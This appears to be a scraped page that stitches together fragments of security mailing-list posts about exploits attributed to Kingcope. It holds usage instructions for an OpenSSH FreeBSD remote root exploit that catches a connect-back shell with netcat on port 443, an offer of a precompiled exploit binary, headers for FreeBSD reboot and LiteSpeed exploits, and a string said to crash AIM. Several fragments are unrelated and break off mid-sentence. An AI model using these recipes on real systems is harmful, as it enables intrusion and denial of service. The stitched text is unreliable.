Hello lists,
you can view my slides notes for my talk entitled Uncovering
Zero-Days and advanced fuzzing held at AthCon 2012 at the following
places:
http://www.isowarez.de/
http://kingcope.wordpress.com/
Cheerio,
/Kingcope
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z yourip target
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
you can apply the patch using the diff if you don't want to run that.
2011/7/1 Benji m...@b3nji.com:
So you want people to download your statically linked binary?
On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
OpenSSH FreeBSD Remote Root Exploit
# Exploit Title: FreeBSD local denial of service - forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE
This source code when compiled and executed
will reboot at least FreeBSD 8.0-RELEASE because of
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard
Even if it did work, the user would have to submit the form with the username
or password fields containing the exploit code rather then enter their own
information.
Pretty unlikely to pull off.
Regardless I talked to the developers and any potential issue will be fixed in
v2.2.13 which is
As all Ascii-Symbols can be displayed in #XXX; format, where XXX are
numbers from 0-255, AIM seems not to check the XXX for higher values
and some strings above 255 result in aim crashing completly or in part.
E.g. the string #770; will result in crashing the whole aim, but #771;
will crash only